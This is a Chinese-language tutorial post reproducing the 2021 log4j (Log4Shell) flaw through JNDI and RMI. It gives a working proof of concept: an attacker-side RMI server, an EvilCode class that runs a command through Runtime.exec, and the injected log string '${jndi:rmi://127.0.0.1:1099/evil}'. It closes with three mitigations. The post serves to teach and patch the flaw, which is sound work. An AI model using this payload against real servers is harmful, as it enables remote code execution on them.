Java RMI引起的log4j漏洞問題重現

2021-12-10日左右,java的log4j框架出現瞭一個大漏洞,對服務器案例引起瞭不小的影響,當然隻對於log4j的日志使用者來說,如果你是spring框架,用的是logback,不存在這個問題。

RMI和JNDIRMI

  • (Remote Method Invocation) 即Java遠程方法調用,一種用於實現遠程過程調用的應用程序編程接口
  • JNDI (Java Naming and Directory Interface)是一個應用程序設計的API,為開發人員提供瞭查找和訪問各種命名和目錄服務的通用、統一的接口
  • JNDI和RMI的主要關系是RMI註冊的服務可以通過JNDIAPI訪問。在討論到Spring反序列化漏洞之前,先看看如果通過JNDI來調用RMI註冊的服務。

模擬漏洞重現

pom依賴

    <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
            <exclusions>
                <exclusion>
                    <groupId>org.springframework.boot</groupId>
                    <artifactId>spring-boot-starter-logging</artifactId>
                </exclusion>
            </exclusions>
        </dependency>

        <!--log4j2核心包-->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.0</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.0</version>
        </dependency>

黑客端

/**
 * 構建RMI服務來響應惡意代碼
 * <p>
 * Java RMI,即 遠程方法調用(Remote Method Invocation),一種用於實現遠程過程調用(RPC)的Java API, 能直接傳輸序列化後的Java對象和分佈式垃圾收集。它的實現依賴於(JVM),因此它僅支持從一個JVM到另一個JVM的調用。
 */
public class RMIServer {
  @SneakyThrows
  public static void main(String... args) {
    try {
      // 本地主機上的遠程對象註冊表Registry的實例,默認端口1099
      LocateRegistry.createRegistry(1099);
      Registry registry = LocateRegistry.getRegistry();
      System.out.println("Create RMI registry on port 1099");
      //返回的Java對象
      Reference reference = new Reference("bug.EvilCode", "bug.EvilCode", null);
      ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
      // 把遠程對象註冊到RMI註冊服務器上,並命名為evil
      registry.bind("evil", referenceWrapper);
    } catch (RemoteException | AlreadyBoundException | NamingException e) {
      e.printStackTrace();
    }
  }

/**
 * 執行任意的腳本,目前的腳本會使windows服務器打開計算器.
 */
public class EvilCode {
  static {
    System.out.println("受害服務器將執行下面命令行");
    Process p;

    String[] cmd = {"calc"};
    try {
      p = Runtime.getRuntime().exec(cmd);
      InputStream fis = p.getInputStream();
      InputStreamReader isr = new InputStreamReader(fis);
      BufferedReader br = new BufferedReader(isr);
      String line = null;
      while ((line = br.readLine()) != null) {
        System.out.println(line);
      }
    } catch (IOException e) {
      e.printStackTrace();
    }
  }
}

網站端

public class Server {
  private static final Logger logger = LogManager.getLogger();

  public static void main(String[] args) {
    String name = "${java:runtime}";
    logger.info("name:{}", name);
    //模擬填寫數據,輸入構造好的字符串,使受害服務器打印日志時執行遠程的代碼 同一臺可以使用127.0.0.1
    String username = "${jndi:rmi://127.0.0.1:1099/evil}";
    //正常打印業務日志
    logger.error("username:{}", username);

  }
}

【緊急補救措施3選1】

  • 修改 JVM 參數 -Dlog4j2.formatMsgNoLookups=true
  • 修改配置 log4j2.formatMsgNoLookups=True
  • 將系統環境變量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 設置為 true

到此這篇關於java RMI引起的log4j漏洞的文章就介紹到這瞭,更多相關java RMI 漏洞內容請搜索WalkonNet以前的文章或繼續瀏覽下面的相關文章希望大傢以後多多支持WalkonNet!

推薦閱讀: